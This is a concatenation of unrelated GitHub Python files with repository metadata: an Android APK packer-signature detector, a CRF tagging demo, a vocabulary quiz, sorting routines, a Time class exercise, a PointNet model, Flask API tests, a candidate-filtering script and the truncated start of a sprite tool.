wyu0hop/check_APPPacker | 9,199,819,983,928 | 2e697d3db308ab8049ea2f4157a6a94acae88db5 | 1d917be085435f66658b86cf9b9b285ecb0a1e56 | /check_APPPacker.py | 2b27a5ab4991963a9e9c404f71a98a86ab0648e9 | [] | no_license | https://github.com/wyu0hop/check_APPPacker | 0c37dfcf02ad36f6a394de351f9b35e00b8096bd | 16d25c0d49d600f16d4e7ddb32a4d02095d51c92 | refs/heads/master | "2022-03-27T14:08:34.663686" | "2019-12-03T06:04:54" | "2019-12-03T06:04:54" | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import zipfile
import sys
#@Time :2019.12.3
#@Author :zengxin
# Signature map: characteristic file-name fragment -> packer description.
# Duplicate keys from the original literal were removed; where a key appeared
# twice with different values, the later (effective) value is kept, so the
# resulting mapping is identical to the original's.
packer_dict = {
    "libchaosvmp.so": "使用了娜迦进行加固",
    "libddog.so": "使用了娜迦进行加固",
    "libfdog.so": "使用了娜迦进行加固",
    "libedog.so": "使用了娜迦企业版进行加固",
    "libexec.so": "使用了爱加密加固(可能性大)或腾讯进行加固",
    "libexecmain.so": "使用了爱加密进行加固",
    "ijiami.dat": "使用了爱加密进行加固",
    "ijiami.ajm": "使用了爱加密企业版进行加固",
    "af.bin": "使用了爱加密进行加固",
    "signed.bin": "使用了爱加密进行加固",
    "libsecexe.so": "使用了梆梆免费版进行加固",
    "libsecmain.so": "使用了梆梆免费版进行加固",
    "libSecShell.so": "使用了梆梆免费版进行加固",
    "secData0.jar": "使用了梆梆免费版进行加固",
    "libSecShell-x86.so": "使用了梆梆免费版进行加固",
    "libDexHelper.so": "使用了梆梆企业版进行加固",
    "libDexHelper-x86.so": "使用了梆梆企业版进行加固",
    "classes.jar": "使用了梆梆定制版进行加固",
    "DexHelper.so": "使用了梆梆定制版进行加固",
    "libprotectClass.so": "使用了360进行加固",
    # ".appkey": "使用了360进行加固",
    "libjiagu.so": "使用了360进行加固",
    "libjiagu_art.so": "使用了360进行加固",
    "libjiagu_x86.so": "使用了360进行加固",
    "libcmvmp.so": "使用了中国移动安全进行加固",
    "libmogosec_dex.so": "使用了中国移动安全进行加固",
    "libmogosec_sodecrypt.so": "使用了中国移动安全进行加固",
    "libmogosecurity.so": "使用了中国移动安全进行加固",
    "mogosec_classes": "使用了中国移动安全进行加固",
    "mogosec_data": "使用了中国移动安全进行加固",
    "mogosec_dexinfo": "使用了中国移动安全进行加固",
    "mogosec_march": "使用了中国移动安全进行加固",
    "libegis.so": "使用了通付盾进行加固",
    "libNSaferOnly.so": "使用了通付盾进行加固",
    "libreincp.so": "使用了珊瑚灵御进行加固",
    "libreincp_x86.so": "使用了珊瑚灵御进行加固",
    "libnqshield.so": "使用了网秦进行加固",
    "libbaiduprotect.so": "使用了百度进行加固",
    "baiduprotect1.jar": "使用了百度进行加固",
    "baiduprotect.jar": "使用了百度进行加固",
    "libuusafe.jar.so": "使用了UU安全进行加固",
    "libuusafe.so": "使用了UU安全进行加固",
    "libuusafeempty.so": "使用了UU安全进行加固",
    # Key kept at its original position; value is the effective (last) one.
    "dp.arm-v7.so.dat": "使用了dexprotect进行加固",
    "dp.arm.so.dat": "使用了dexprotect进行加固",
    "aliprotect.dat": "使用了阿里聚安全进行加固",
    "libsgmain.so": "使用了阿里聚安全进行加固",
    "libsgsecuritybody.so": "使用了阿里聚安全进行加固",
    "libmobisec.so": "使用了阿里聚安全进行加固",
    "libfakejni.so": "使用了阿里聚安全进行加固",
    "libzuma.so": "使用了阿里聚安全进行加固",
    "libzumadata.so": "使用了阿里聚安全进行加固",
    "libpreverify1.so": "使用了阿里聚安全进行加固",
    "classes.dex.dat": "使用了dexprotect进行加固",
    "libtup.so": "使用了腾讯进行加固",
    "libshell.so": "使用了腾讯进行加固",
    "tencent_stub": "使用了腾讯进行加固",
    "mix.dex": "使用了腾讯进行加固",
    "libshella": "使用了腾讯进行加固",
    "libshellx": "使用了腾讯进行加固",
    "libshella-xxxx.so": "使用了腾讯进行加固",
    "libshellx-xxxx.so": "使用了腾讯进行加固",
    "mixz.dex": "使用了腾讯进行加固",
    "libtosprotection.armeabi.so": "使用了腾讯御安全进行加固",
    "libtosprotection.armeabi-v7a.so": "使用了腾讯御安全进行加固",
    "libtosprotection.x86.so": "使用了腾讯御安全进行加固",
    "libtest.so": "使用了腾讯御安全进行加固",
    "tosversion": "使用了腾讯御安全进行加固",
    "libTmsdk": "使用了腾讯御安全进行加固",
    "libTmsdk-xxx-mfr.so": "使用了腾讯御安全进行加固",
    "libnesec.so": "使用了网易易盾进行加固",
    "libAPKProtect.so": "使用了APKProtect进行加固",
    "libkwscmm.so": "使用了几维安全进行加固",
    "libkwscr.so": "使用了几维安全进行加固",
    "libkwslinker.so": "使用了几维安全进行加固",
    "kdpdata.so": "使用了几维安全进行加固",
    "dex.dat": "使用了几维安全进行加固",
    "libkdp.so": "使用了几维安全进行加固",
    "libx3g.so": "使用了顶像科技进行加固",
    "libapssec.so": "使用了盛大进行加固",
    "librsprotect.so": "使用了瑞星进行加固",
    "libitsec.so": "使用了海云安进行加固",
    "itse": "使用了海云安进行加固",
    "libapktoolplus_jiagu.so": "使用了apktoolplus进行加固",
    "jiagu_data.bin": "使用了apktoolplus进行加固",
    "sign.bin": "使用了apktoolplus进行加固"
}


def packerDetector(apkpath):
    """Detect which packer (if any) protected the APK at *apkpath*.

    Scans the archive member names for known signature fragments; as in the
    original, the last matching signature wins.  Prints the verdict and also
    returns it (new, backward-compatible return value).

    :param apkpath: path to an APK (zip) file
    :return: the packer description string
    """
    packertype = "未进行加固或未匹配到该特征库"
    # BUGFIX: close the archive deterministically (the original leaked the
    # ZipFile handle); the unused `packersign` variable was removed.
    with zipfile.ZipFile(apkpath) as zf:
        for fileName in zf.namelist():
            for packer in packer_dict:
                if packer in fileName:
                    packertype = packer_dict[packer]
    print("经检测,该apk" + packertype)
    return packertype
def main():
    """Entry point: expect exactly one argument, the APK path."""
    if len(sys.argv) != 2:
        # Usage message (guard clause instead of if/else).
        print("请输入正确的apk包名")
        print("eg:python3 check_APPPacker.py whm_2019.apk")
        return
    packerDetector(sys.argv[1])


if __name__ == '__main__':
    main()
| UTF-8 | Python | false | false | 5,453 | py | 2 | check_APPPacker.py | 1 | 0.710786 | 0.697832 | 0 | 119 | 28.840336 | 59 |
retresco/pcrf | 9,603,546,900,695 | ef1f88edce6806df32090cc4dae6ea35b065eb27 | 185380ede44d0227563d2a5d8aff26228ec0b5ff | /python-wrapper/pcrf-apply-demo.py | 30920937a0f592de90ca6ec5bce53f8c4da8bfa6 | [
"MIT"
] | permissive | https://github.com/retresco/pcrf | b4086b66aba88c704530e82e9a49a202514875a5 | 329982ade6a5a785d5fc7b76933557aed81d2206 | refs/heads/master | "2021-01-10T05:09:29.491082" | "2016-02-16T16:48:21" | "2016-02-16T16:48:21" | 36,813,622 | 3 | 3 | null | false | "2015-07-30T09:18:26" | "2015-06-03T15:43:18" | "2015-06-13T12:10:43" | "2015-07-30T07:43:35" | 348 | 2 | 3 | 0 | C++ | null | null | import pcrf_python
import json
# Load config file
# Load config file and switch the tokenizer to running-text input.
config = pcrf_python.CRFConfiguration("../demo/chunk.cfg")
config.set_running_text_input(True)

# Load model
model = pcrf_python.SimpleLinearCRFFirstOrderModel("../demo/chunker.model")

# Construct applier on the basis of the CRF model and the configuration
crf_applier = pcrf_python.FirstOrderLCRFApplier(model, config)

# Set the output mode to "tab-separated" (the other possibility is "json",
# but this currently works only for NER tasks)
crf_applier.set_output_mode("tsv")

# Apply to input string.
utf8_string = "Merkel and Obama met at the G7 summit at Schloss Elmau near Garmisch-Partenkirchen."
out_string = crf_applier.apply_to(utf8_string)
print('\nResults')
# BUGFIX: `print out_string` is Python-2-only syntax; the parenthesized form
# is valid under both Python 2 and Python 3.
print(out_string)

# Apply to file.
out_string = crf_applier.apply_to_text_file("cl-final.txt")
print('\nResults')
print(out_string)
| UTF-8 | Python | false | false | 852 | py | 45 | pcrf-apply-demo.py | 33 | 0.765258 | 0.761737 | 0 | 27 | 30.481481 | 99 |
temirxan011/balton | 14,585,708,976,271 | 45b6415a443fd2292b54d1a05579d951725ec25d | 6222dc42f191f2417eb89dbe4fb3470928aba875 | /Iearn_dict.py | 3ac1d90fa5c3ee04d02c875cbdfda68c551569ac | [] | no_license | https://github.com/temirxan011/balton | 1a9c3133af1ec0f069d49d825fa2dc813539b0b3 | 97a5e18f11f9c2e8555b6e15e34752252abdf44a | refs/heads/main | "2023-08-11T12:54:47.975893" | "2021-10-11T05:49:43" | "2021-10-11T05:49:43" | 415,652,568 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import os
def learn_dict():
os.system('CLS')
statistics_right = statistics_wrong = 0 # переменные для введения статистики
# вывод всех словарей
dict_list = os.listdir(path='./dict')
print('\nСПИСОК ДОСТУПНЫХ СЛОВАРЕЙ')
for i in dict_list:
print('| ' + i, end=' ')
# запись данных из файла в список
name_dict = input('\nВведите название словаря: ')
with open('./dict/' + name_dict + '.txt', 'r') as f:
dict = f.read().split("|")
# процесс обучения и проверки правильности перевода
print('\n----------|' + name_dict + '|-----------')
for i in range(0, (len(dict)//2) + 2, 2):
print(dict[i])
str_translite = input('Перевод: ')
if str_translite == dict[i + 1]:
print('ПРАВИЛЬНО' + '\n-----------------------------')
statistics_right += 1
else:
print('ОШИБКА,' + ' ПРАВИЛЬНЫЙ ОТВЕТ: ' + dict[i+1] + '\n-----------------------------')
statistics_wrong += 1
print('--------|' + 'СТАТИСТИКА' + '|---------' + '\nПРАВИЛЬНО: ', statistics_right, ' | НЕПРАВИЛЬНО: ', statistics_wrong) | UTF-8 | Python | false | false | 1,357 | py | 4 | Iearn_dict.py | 3 | 0.509317 | 0.501331 | 0 | 29 | 37.896552 | 127 |
frolkin28/alg_lab2 | 4,999,341,938,638 | ebb601483af7334391597cea372f39559d431e6e | 502edb2d07a4c8ab43623819518a47e0b8c9d352 | /alg2.py | d4a10a22ab6fc08e40f267d3597f2b691ecaf7a0 | [] | no_license | https://github.com/frolkin28/alg_lab2 | cc9d470d22c3449063499937eaa67bc41110333a | 1f9faa210826045f04090acf3dd520641002a9ab | refs/heads/master | "2021-01-05T21:48:12.877709" | "2020-02-18T19:15:45" | "2020-02-18T19:15:45" | 241,146,368 | 0 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null | def selection_sort(array):
i, size = 0, len(array)
comps, swaps = 0, 0
while i < size:
min_i, j = i, i + 1
while j < size:
comps += 1
if array[j] < array[min_i]:
min_i = j
j += 1
swaps += 1
array[i], array[min_i] = array[min_i], array[i]
i += 1
return array, comps, swaps
def merge(array, l, m, r):
    """Merge the sorted runs array[l..m] and array[m+1..r] in place.

    Returns (comparisons, element_moves) performed during this merge.
    """
    comps, swaps = 0, 0
    l_copy = array[l:m + 1]
    r_copy = array[m + 1:r + 1]
    l_copy_index = 0
    r_copy_index = 0
    sorted_index = l
    while l_copy_index < len(l_copy) and r_copy_index < len(r_copy):
        comps += 1
        if l_copy[l_copy_index] <= r_copy[r_copy_index]:
            array[sorted_index] = l_copy[l_copy_index]
            l_copy_index += 1
        else:
            array[sorted_index] = r_copy[r_copy_index]
            r_copy_index += 1
        swaps += 1
        sorted_index += 1
    # Drain whichever side still has elements.
    while l_copy_index < len(l_copy):
        array[sorted_index] = l_copy[l_copy_index]
        l_copy_index += 1
        sorted_index += 1
        swaps += 1
    while r_copy_index < len(r_copy):
        array[sorted_index] = r_copy[r_copy_index]
        r_copy_index += 1
        sorted_index += 1
        swaps += 1
    return comps, swaps


# Module-level counters; they accumulate across merge_sort calls (original design).
comps, swaps = 0, 0


def merge_sort(array, left, right):
    """Recursive in-place merge sort of array[left..right].

    Returns (array, comps, swaps), where the counters are the module-level
    running totals.  BUGFIX: removed a stray debug print of the whole array
    that ran after every merge step.
    """
    global comps, swaps
    if left < right:
        m = (left + right) // 2
        merge_sort(array, left, m)
        merge_sort(array, m + 1, right)
        temp_comps, temp_swaps = merge(array, left, m, right)
        comps += temp_comps
        swaps += temp_swaps
    return array, comps, swaps
uservipin/python | 11,012,296,159,913 | b35ddf463357dbae37de88ee00b8184fe6bf71de | 8370a2408372fd7b828a58cac149e690bd409308 | /Classe_modules_practise/Create_Time_class.py | 2c89816f311b900506aa04343789a5b3d0d7c8e1 | [] | no_license | https://github.com/uservipin/python | a0f7176817cfabbc75d7f4999efd6d4667455c19 | 6f7e99038e262558c395ccbdbbb26175bf55e8b7 | refs/heads/main | "2023-01-06T21:12:49.604069" | "2022-12-28T18:02:42" | "2022-12-28T18:02:42" | 93,314,161 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # Create a Time class and initialize it with hours and minutes.
# 1. Make a method addTime which should take two time object and add them.
# E.g.- # (2 hour and 50 min)+(1 hr and 20 min) is (4 hr and 10 min)
# 2. Make a method displayTime which should print the time.
# 3. Make a method DisplayMinute which should display the total minutes in the Time.
# E.g.- (1 hr 2 min) should display 62 minute.
class Time:
    """A duration expressed as hours and minutes.

    BUGFIX: the original addTime computed its result into local variables and
    returned None, and total_minutes()/minutes_and_hours() always returned the
    0 placeholders set in __init__.  They now compute real values.
    """

    def __init__(self, hours, minutes):
        self.hours = hours
        self.minutes = minutes
        # Kept for backward compatibility with the original attribute set.
        self.total_minute = 0
        self.minutes_and_hour = 0

    def addTime(time_1, time_2):
        """Add two Time objects and return a new, normalized Time.

        e.g. (2 h 50 min) + (1 h 20 min) -> Time(4, 10).
        """
        total = time_1.total_minutes() + time_2.total_minutes()
        return Time(total // 60, total % 60)

    def displayTime(self):
        """Print the time as 'H hr M min'."""
        print(str(self.hours) + ' hr ' + str(self.minutes) + ' min')

    def total_minutes(self):
        """Return the total length in minutes (1 h 2 min -> 62)."""
        return self.hours * 60 + self.minutes

    def minutes_and_hours(self):
        """Return [hours, minutes] with minutes normalized below 60."""
        total = self.total_minutes()
        return [total // 60, total % 60]
# Demo: construct two times and add them.
t1 = Time(3,40)
t2 = Time(4,50)
# NOTE(review): verify that addTime returns the summed Time; if it returns
# None (as the broken implementation does), t3 ends up None here.
t3 =Time.addTime(t1,t2)
ywcmaike/pcdnet | 6,597,069,794,803 | 747f50b319131a8463585fd26de4efac48e97337 | 7c9b4c05573c197b2b28748ecdde76d27cf62c03 | /model/point_model.py | d726a1ad9eff515ac85262ad58aeb6b314855abe | [] | no_license | https://github.com/ywcmaike/pcdnet | c196f45bbd0a79385c6743bf06411743d2d9a9d7 | 04330bec176cf2ea594542bb6005559bc8f77a7d | refs/heads/master | "2022-03-23T01:16:20.385042" | "2020-01-05T13:34:37" | "2020-01-05T13:34:37" | 231,919,582 | 9 | 2 | null | null | null | null | null | null | null | null | null | null | null | null | null | import torch
import torch.nn as nn
import torch.nn.functional as F
from .layer.project import GraphProject, GraphProjectU
def maxpool(x, dim=-1, keepdim=False):
out, _ = x.max(dim=dim, keepdim=keepdim)
return out
class ResnetBlockFC(nn.Module):
def __init__(self, size_in, size_out=None, size_h=None):
super().__init__()
# Attributes
if size_out is None:
size_out = size_in
if size_h is None:
size_h = min(size_in, size_out)
self.size_in = size_in
self.size_h = size_h
self.size_out = size_out
# Submodules
self.fc_0 = nn.Linear(size_in, size_h)
self.fc_1 = nn.Linear(size_h, size_out)
self.actvn = nn.ReLU()
if size_in == size_out:
self.shortcut = None
else:
self.shortcut = nn.Linear(size_in, size_out, bias=False)
# Initialization
nn.init.zeros_(self.fc_1.weight)
def forward(self, x):
net = self.fc_0(self.actvn(x))
dx = self.fc_1(self.actvn(net))
if self.shortcut is not None:
x_s = self.shortcut(x)
else:
x_s = x
return x_s + dx
class ResnetPointnet(nn.Module):
def __init__(self, input_dim=128, output_dim=3, hidden_dim=128):
super().__init__()
self.fc_pos = nn.Linear(input_dim, 2*hidden_dim)
self.block_0 = ResnetBlockFC(2*hidden_dim, hidden_dim)
self.block_1 = ResnetBlockFC(2*hidden_dim, hidden_dim)
self.block_2 = ResnetBlockFC(2*hidden_dim, hidden_dim)
self.block_3 = ResnetBlockFC(2*hidden_dim, hidden_dim)
self.block_4 = ResnetBlockFC(2*hidden_dim, hidden_dim)
self.fc_c = nn.Linear(hidden_dim, output_dim)
self.actvn = nn.ReLU()
self.pool = maxpool
def forward(self, p):
batch_size, T, D = p.size()
# output size: B x T X F
net = self.fc_pos(p)
net = self.block_0(net)
pooled = self.pool(net, dim=1, keepdim=True).expand(net.size())
net = torch.cat([net, pooled], dim=2)
net = self.block_1(net)
pooled = self.pool(net, dim=1, keepdim=True).expand(net.size())
net = torch.cat([net, pooled], dim=2)
net = self.block_2(net)
pooled = self.pool(net, dim=1, keepdim=True).expand(net.size())
net = torch.cat([net, pooled], dim=2)
net = self.block_3(net)
pooled = self.pool(net, dim=1, keepdim=True).expand(net.size())
net = torch.cat([net, pooled], dim=2)
net = self.block_4(net)
c = self.fc_c(self.actvn(net))
return c
class ResPointNet(nn.Module):
    """Refine 3-D points using image features sampled at their projections.

    Projects *points* into *img_feats* via GraphProjectU, feeds the sampled
    features through a residual PointNet, and adds the predicted per-point
    offsets back onto the input points.
    """

    def __init__(self, input_channel, param, output_channel=3):
        super(ResPointNet, self).__init__()
        # NOTE(review): output_channel is currently unused — ResnetPointnet
        # defaults to 3 output channels; confirm whether it should be passed.
        self.param = param
        self.project = GraphProjectU(param.use_z_weight)
        self.respoint = ResnetPointnet(input_channel)

    def forward(self, img_feats, points, proj_mat):
        # Sample image features at the projected point locations.
        # (Removed the original's unused local `B = img_feats.shape[0]`.)
        x = self.project(points, img_feats, proj_mat)
        # Predict residual offsets and apply them to the input points.
        output_points = self.respoint(x)
        return output_points + points
sohaibullah4d/Practice-Problems | 4,028,679,325,922 | 56609fe16f6286f077669192ef501f1bdc96c4ed | 68601a11f81f414bada398cc38fac197326babc6 | /3.2(a).py | 5b29f42805c266180beb94e13cbd0b19e0753e4a | [] | no_license | https://github.com/sohaibullah4d/Practice-Problems | cffec945e08d4baa93a454a0aab90aee13144f72 | 7ba4dd30b1381bbbd2969efe3205bd48bfc55d56 | refs/heads/master | "2020-04-07T15:55:56.243411" | "2018-11-21T07:37:28" | "2018-11-21T07:37:28" | 158,507,677 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | print("MUHAMMAD SOHAIB - 18B-054-CS - section A")
print("\t\t\t PRACTICE PROBLEM 3.2(a)")
age = int(input("Enter ypur age:"))
if age > 62:
print("You can get your pension benefits")
else:
print("Sorry")
| UTF-8 | Python | false | false | 222 | py | 15 | 3.2(a).py | 15 | 0.621622 | 0.581081 | 0 | 9 | 22.666667 | 49 |
acarter881/exercismExercises | 2,078,764,194,163 | 528cc46052df112413b0774f8a7a721d45d72d11 | df2c7670a30d24cb53a0e3e4177f3cdfd381a5a0 | /acronym/acronym.py | 19bae512e68a6d518f4a0d925be055d315920aaa | [] | no_license | https://github.com/acarter881/exercismExercises | d25a40de570db47edb95334c4c324f0707bedf50 | 3fe82d93ed89316630fe1819f60b075fc77f327e | refs/heads/main | "2023-07-26T02:21:22.701555" | "2021-09-05T21:32:22" | "2021-09-05T21:32:22" | 376,628,449 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import re
acroRegEx = re.compile("([A-Za-z])[A-Za-z']*")
def abbreviate(words):
return ''.join(re.findall(acroRegEx, words)).upper()
print(abbreviate('Complementary metal-oxide semiconductor')) | UTF-8 | Python | false | false | 200 | py | 59 | acronym.py | 55 | 0.705 | 0.705 | 0 | 8 | 24.125 | 60 |
zhangpeng0v0/Python_learning_notes | 1,924,145,385,275 | 1ea9de413d6b05732fd981de8c56f58003aa8c2b | 05ad79e3698bb484a7c0272a15610d3da955a5f3 | /Python_learning_notes/code/函数/函数和过程.py | c8dea7185ae0f5391559a20b193c2610106e33b3 | [] | no_license | https://github.com/zhangpeng0v0/Python_learning_notes | 5bcd3292f5d770c8cc2e895433698a7aa372ef42 | 8f2dc18bb13a07ec92c489d28afd66da1186bea9 | refs/heads/master | "2022-01-22T18:29:44.391295" | "2019-06-13T05:59:59" | "2019-06-13T05:59:59" | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # def fun():
# return None
#
# fun()
#
# def fun():
# print('hello world')
#
#
# print('hello world') | UTF-8 | Python | false | false | 109 | py | 73 | 函数和过程.py | 42 | 0.504587 | 0.504587 | 0 | 10 | 10 | 26 |
guru-aot/ccpractice | 326,417,557,314 | 2e29d40ab39f0f4dec0980ef5d7e45b33c03c3f7 | 371a10da1ed0c978cb285fbe303ae493d79da1a7 | /backend/tests/test_api.py | 9880f34d9036890de11405c4af73008a41b4a503 | [] | no_license | https://github.com/guru-aot/ccpractice | 634940a8abf2455fe18fb4a0d151bcf614210046 | cdcc98ce6550d80767f392dfbe83f946e1effa4d | refs/heads/main | "2023-03-30T16:53:21.428265" | "2021-03-26T03:59:52" | "2021-03-26T03:59:52" | 351,512,799 | 0 | 0 | null | true | "2021-03-25T16:59:36" | "2021-03-25T16:59:35" | "2021-03-24T22:05:49" | "2021-03-24T22:30:19" | 2,193 | 0 | 0 | 0 | null | false | false | import uuid
# JOSE header used for all test tokens.
TEST_JWT_HEADER = {
    "alg": "RS256",
    "typ": "JWT",
    "kid": "foiclientapp"
}

# Claims for a test user holding the "approver" role.
TEST_JWT_CLAIMS = {
    "iss": "https://iam.aot-technologies.com/auth/realms/foirealm",
    "sub": "3559e79c-7115-41c1-bb26-1a3dc54bbf5e",
    "aud": ["foiclientapp"],
    "firstname": "Test",
    "lastname": "User",
    "realm_access": {
        "roles": [
            "approver"
        ]
    },
    "preferred_username": "user"
}


def factory_auth_header(jwt, claims):
    """Produce JWT tokens for use in tests."""
    token = jwt.create_jwt(claims=claims, header=TEST_JWT_HEADER)
    return {'Authorization': 'Bearer ' + token}


# Canonical request payload used by the POST tests.
REQUEST_OBJECT = {
    'name': 'unit test1',
    'description': 'Unit test the post request status',
    'status': 'submitted',
    'createdby': 'unittest user',
    'updated': False,
    'transactionid': str(uuid.uuid4())
}
def test_ping(app, client):
    # The root endpoint responds OK without authentication.
    resp = client.get('/')
    assert resp.status_code == 200
def test_secure(app, client, jwt):
    # An authenticated GET to the secured test endpoint succeeds.
    auth = factory_auth_header(jwt=jwt, claims=TEST_JWT_CLAIMS)
    resp = client.get('requests/test', headers=auth)
    assert resp.status_code == 200
# def test_ping_text(app, client, jwt):
# headers = factory_auth_header(jwt=jwt, claims=TEST_JWT_CLAIMS)
# response = client.get('/ping', headers=headers)
# assert b'pong' in response.data
def test_get_requests(app, client, jwt):
    # Listing all requests with a valid token returns 200.
    auth = factory_auth_header(jwt=jwt, claims=TEST_JWT_CLAIMS)
    resp = client.get('/requests/all', headers=auth)
    assert resp.status_code == 200
def test_get_requests_text(app, client, jwt):
    # The listing body is expected to contain the seeded 'test' record.
    auth = factory_auth_header(jwt=jwt, claims=TEST_JWT_CLAIMS)
    resp = client.get('/requests/all', headers=auth)
    assert b'test' in resp.data
def test_post_requests(app, client, jwt):
    # Creating a request from the canonical payload returns 200.
    auth = factory_auth_header(jwt=jwt, claims=TEST_JWT_CLAIMS)
    resp = client.post('/requests/add', json=REQUEST_OBJECT, headers=auth)
    assert resp.status_code == 200
def test_post_requests_text(app, client, jwt):
    # A successful create is reported as 'true' in the response body.
    auth = factory_auth_header(jwt=jwt, claims=TEST_JWT_CLAIMS)
    payload = {'name': 'unit test2', 'description': 'Unit test the POST request text',
               'status': 'submitted', 'createdby': 'unittest user', 'updated': False,
               'transactionid': str(uuid.uuid4())}
    resp = client.post('/requests/add', json=payload, headers=auth)
    assert b'true' in resp.data
def test_update_requests(app, client, jwt):
    # Updating an existing request (id 10) returns 200.
    auth = factory_auth_header(jwt=jwt, claims=TEST_JWT_CLAIMS)
    payload = {'name': 'unit test3', 'description': 'Unit test the PUT request text',
               'status': 'submitted', 'createdby': 'unittest user', 'updated': False,
               'transactionid': str(uuid.uuid4())}
    resp = client.put('/requests/10', json=payload, headers=auth)
    assert resp.status_code == 200
# def test_delete_requests(app, client, jwt):
# headers = factory_auth_header(jwt=jwt, claims=TEST_JWT_CLAIMS)
# response = client.delete('/requests/12', headers=headers)
# assert response.status_code == 200
| UTF-8 | Python | false | false | 3,074 | py | 77 | test_api.py | 49 | 0.660052 | 0.643461 | 0 | 93 | 32.053763 | 106 |
sbtries/class_pandaaaa | 17,351,667,878,018 | f5c3fd97d7f95c0e0d0d87fcee6ea08044227568 | aef69557d8960205a780e61b7c2dfbb1d7733449 | /Code/Theo/django/todo/todo_app/migrations/0002_alter_todoitem_completed_date.py | bf109484aae1281150831d0a101170f157275702 | [] | no_license | https://github.com/sbtries/class_pandaaaa | 579d6be89a511bdc36b0ce8c95545b9b704a734a | bbf9c419a00879118a55c2c19e5b46b08af806bc | refs/heads/master | "2023-07-18T14:18:25.881333" | "2021-09-02T22:48:29" | "2021-09-02T22:48:29" | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # Generated by Django 3.2.5 on 2021-07-29 21:18
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('todo_app', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='todoitem',
name='completed_date',
field=models.DateTimeField(null=True),
),
]
| UTF-8 | Python | false | false | 386 | py | 562 | 0002_alter_todoitem_completed_date.py | 347 | 0.588083 | 0.53886 | 0 | 18 | 20.444444 | 50 |
tori46/DeDiv | 15,693,810,545,881 | 676fe7f9ffb4f8e85e9d381e6817e26f45c9c8f9 | e75324ac6a13d5176feb62dcb6310035bae16f4b | /filter_top_scores.py | f1c0823386d01aa15cb578a8257fadf1d3990d86 | [] | no_license | https://github.com/tori46/DeDiv | f393d6fea1aca446b51d9a2ff34d9c484953c164 | 27c9cc4c06e512594ab9ac6c1b6853762a137729 | refs/heads/master | "2023-03-22T14:15:25.388100" | "2021-03-15T17:06:34" | "2021-03-15T17:06:34" | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | """Filter the candidate outputs to the ones with highest likelihood score."""
import glob
import json
import csv
import editdistance
import nltk
from bert_serving.client import BertClient
from mosestokenizer import MosesDetokenizer
from sklearn.cluster import KMeans
import collections
import configargparse
import numpy as np
import os
def filter_candidates(candidates, scores, num_candidates):
    """Return the *num_candidates* unique, non-empty candidates with the highest scores."""
    best, best_scores = [], []
    ranked = sorted(zip(candidates, scores), key=lambda pair: pair[1], reverse=True)
    for cand, score in ranked:
        if len(cand) > 0 and cand not in best and len(best) < num_candidates:
            best.append(cand)
            best_scores.append(score)
    # The caller is assumed to always supply enough unique candidates.
    assert len(best) == num_candidates
    return best, best_scores


def main(opt):
    """Trim every experiment JSON in opt.input_dir to its top-scoring candidates."""
    if not os.path.exists(opt.output_dir):
        os.makedirs(opt.output_dir)

    all_results = {}  # unused in the original; retained for compatibility
    for json_file in glob.glob(os.path.join(opt.input_dir, '*.json')):
        out_json_file = os.path.join(opt.output_dir, os.path.basename(json_file))
        # Don't redo files that were already written out.
        if os.path.isfile(out_json_file):
            print("SKIPPING: " + json_file)
            continue
        with open(json_file, 'r') as f:
            try:
                experiment = json.load(f)
                print('Processing ' + json_file)
            except:
                print('Error processing ' + json_file)
                print('Skipping it.')
                continue
        for ex_num, example in enumerate(experiment['results']):
            cands, cand_scores = filter_candidates(
                example['pred'], example['scores'], opt.num_cands)
            # Echo the first few examples for a quick sanity check.
            if ex_num < 3:
                print(cands)
                print(cand_scores)
            example['pred'] = cands
            example['scores'] = cand_scores
        with open(out_json_file, 'w') as f:
            json.dump(experiment, f)
if __name__ == '__main__':
    # Command-line / YAML-config argument handling.
    arg_parser = configargparse.ArgumentParser(
        description='analyze_diversity.py',
        config_file_parser_class=configargparse.YAMLConfigFileParser,
        formatter_class=configargparse.ArgumentDefaultsHelpFormatter)
    cli = arg_parser.add_argument_group('Arguments')
    cli.add('--input_dir', type=str, required=True,
            help='Directory containing json files.')
    cli.add('--output_dir', type=str, required=True,
            help='Directory to write out files.')
    cli.add('--num_cands', type=int, default=10,
            help='The target number of candidates.')

    opt = arg_parser.parse_args()
    main(opt)
| UTF-8 | Python | false | false | 2,746 | py | 106 | filter_top_scores.py | 11 | 0.65732 | 0.655499 | 0 | 85 | 31.305882 | 93 |
vgmoose/Splite | 8,031,588,890,991 | e8cfd4b8b9c262c688e42350b69ccc20a5cada21 | 3c2fc3e906b1836a4c28458cf97aca2882b5f40e | /splite.py | 29573e4c53bb78ec9c8dc3716285b09e63cae5e9 | [] | no_license | https://github.com/vgmoose/Splite | 0c1eaa225674c519efa731261faf722637009038 | 78596bd3def2081fe934b3bb7f6a17bb57226c6b | refs/heads/master | "2021-01-10T02:00:16.504011" | "2016-01-19T07:04:31" | "2016-01-19T07:04:31" | 49,922,385 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import json
import sys
import os
print ".--=============--=============--."
print "| Welcome to Splite! |"
print ".--=============--=============--."
yeswords = ["yes", "y", "ya", "ok", "okay"]
try:
from PIL import Image
except:
ans = raw_input("The Python Image Library is required to continue. Install it now? ")
if ans.lower() in yeswords:
try:
os.system("sudo easy_install pip")
os.system("sudo pip install Pillow")
except:
print("Install failed. Make sure you have a working gcc compiler")
exit()
prev = []
try:
f = open(".prev", "r")
for line in f:
prev.append(line)
f.close()
except:
pass
cur = open(".prev", "w")
cur_line = 0
def to_rgb(argb):
    # Convert an (r, g, b, a) pixel tuple to a hex string
    # (str.encode('hex') is Python-2-only).
    return "".join(map(chr, argb)).encode('hex')
def sp_input(msg, default=""):
    """Prompt with *msg*, offering last run's answer (or *default*) as the fallback.

    Each answer is appended to the .prev cache; cur_line tracks which cached
    answer corresponds to the current prompt.
    """
    global cur_line
    out = "| " + msg
    old = ""
    try:
        old += prev[cur_line].rstrip("\n")
    except:
